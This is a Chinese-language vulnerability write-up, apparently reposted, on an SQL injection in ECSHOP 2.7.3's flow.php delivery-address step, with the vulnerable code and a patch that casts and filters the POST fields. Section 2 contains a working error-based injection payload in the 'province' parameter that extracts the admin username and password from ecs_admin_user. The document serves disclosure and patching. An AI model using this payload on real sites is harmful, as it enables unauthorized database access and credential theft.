1. 漏洞描述
ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞,攻击者可利用火狐tamper data等插件修改提交到配送地址页面的post数据,造成未授权的数据库操作甚至执行任意代码
Relevant Link:
http: // sebug.net/vuldb/ssvid-60554
2. 漏洞触发条件
1 . 先注册账户,随便选个商品进购物车,然后填地址,电话等等 2 . 把任意商品加入购物车在填写配送地址那一页,有地区选择 3 . http: // localhost/ecshop2.7.3/flow.php?step=consignee&direct_shopping=1 // 比如省选择安徽 3 . 其中POST数据如下 country = 1 &province= 3 &city= 37 &district= 409 &consignee= 11111 &email= 11111111 %40qq.com&address= 1111111111 &zipcode= 11111111 &tel= 1111111111111111111 &mobile= 11111111 &sign_building= 111111111 &best_time= 111111111 &Submit=%E9% 85 %8D%E9% 80 % 81 %E8% 87 %B3%E8%BF% 99 %E4%B8%AA%E5%9C%B0%E5%9D% 80 &step=consignee&act=checkout&address_id=province= 3 用firefox tamper data改成 localhost province = 3 ‘ ) and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 # 4 . 就会回显错误页面了
Relevant Link:
http: // www.2cto.com/Article/201212/179861.html
3. 漏洞影响范围
4. 漏洞代码分析
/flow.php
elseif ($_REQUEST[ ‘ step ‘ ] == ‘ consignee ‘ )
{
...
// 未对POST数据进行有效过滤
else
{
/*
* 保存收货人信息
*/
$consignee = array(
‘ address_id ‘ => empty($_POST[ ‘ address_id ‘ ]) ? 0 : intval($_POST[ ‘ address_id ‘ ]),
‘ consignee ‘ => empty($_POST[ ‘ consignee ‘ ]) ? ‘‘ : trim($_POST[ ‘ consignee ‘ ]),
‘ country ‘ => empty($_POST[ ‘ country ‘ ]) ? ‘‘ : $_POST[ ‘ country ‘ ],
‘ province ‘ => empty($_POST[ ‘ province ‘ ]) ? ‘‘ : $_POST[ ‘ province ‘ ],
‘ city ‘ => empty($_POST[ ‘ city ‘ ]) ? ‘‘ : $_POST[ ‘ city ‘ ],
‘ district ‘ => empty($_POST[ ‘ district ‘ ]) ? ‘‘ : $_POST[ ‘ district ‘ ],
‘ email ‘ => empty($_POST[ ‘ email ‘ ]) ? ‘‘ : $_POST[ ‘ email ‘ ],
‘ address ‘ => empty($_POST[ ‘ address ‘ ]) ? ‘‘ : $_POST[ ‘ address ‘ ],
‘ zipcode ‘ => empty($_POST[ ‘ zipcode ‘ ]) ? ‘‘ : make_semiangle(trim($_POST[ ‘ zipcode ‘ ])),
‘ tel ‘ => empty($_POST[ ‘ tel ‘ ]) ? ‘‘ : make_semiangle(trim($_POST[ ‘ tel ‘ ])),
‘ mobile ‘ => empty($_POST[ ‘ mobile ‘ ]) ? ‘‘ : make_semiangle(trim($_POST[ ‘ mobile ‘ ])),
‘ sign_building ‘ => empty($_POST[ ‘ sign_building ‘ ]) ? ‘‘ : $_POST[ ‘ sign_building ‘ ],
‘ best_time ‘ => empty($_POST[ ‘ best_time ‘ ]) ? ‘‘ : $_POST[ ‘ best_time ‘ ],
);
..
5. 防御方法
/flow.php
elseif ($_REQUEST[ ‘ step ‘ ] == ‘ consignee ‘ )
{
...
else
{
/*
* 保存收货人信息
*/
$consignee = array(
/* 对用户输入的POST数据进行有效过滤 */
‘ address_id ‘ => empty($_POST[ ‘ address_id ‘ ]) ? 0 : intval($_POST[ ‘ address_id ‘ ]),
‘ consignee ‘ => empty($_POST[ ‘ consignee ‘ ]) ? ‘‘ : compile_str(trim($_POST[ ‘ consignee ‘ ])),
‘ country ‘ => empty($_POST[ ‘ country ‘ ]) ? ‘‘ : intval($_POST[ ‘ country ‘ ]),
‘ province ‘ => empty($_POST[ ‘ province ‘ ]) ? ‘‘ : intval($_POST[ ‘ province ‘ ]),
‘ city ‘ => empty($_POST[ ‘ city ‘ ]) ? ‘‘ : intval($_POST[ ‘ city ‘ ]),
‘ district ‘ => empty($_POST[ ‘ district ‘ ]) ? ‘‘ : intval($_POST[ ‘ district ‘ ]),
/* */
‘ email ‘ => empty($_POST[ ‘ email ‘ ]) ? ‘‘ : compile_str($_POST[ ‘ email ‘ ]),
‘ address ‘ => empty($_POST[ ‘ address ‘ ]) ? ‘‘ : compile_str($_POST[ ‘ address ‘ ]),
‘ zipcode ‘ => empty($_POST[ ‘ zipcode ‘ ]) ? ‘‘ : compile_str(make_semiangle(trim($_POST[ ‘ zipcode ‘ ]))),
‘ tel ‘ => empty($_POST[ ‘ tel ‘ ]) ? ‘‘ : compile_str(make_semiangle(trim($_POST[ ‘ tel ‘ ]))),
‘ mobile ‘ => empty($_POST[ ‘ mobile ‘ ]) ? ‘‘ : compile_str(make_semiangle(trim($_POST[ ‘ mobile ‘ ]))),
‘ sign_building ‘ => empty($_POST[ ‘ sign_building ‘ ]) ? ‘‘ :compile_str($_POST[ ‘ sign_building ‘ ]),
‘ best_time ‘ => empty($_POST[ ‘ best_time ‘ ]) ? ‘‘ : compile_str($_POST[ ‘ best_time ‘ ]),
);
..
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
ecshop /flow.php SQL Injection Vul
标签:
查看更多关于ecshop /flow.php SQL Injection Vul的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did160735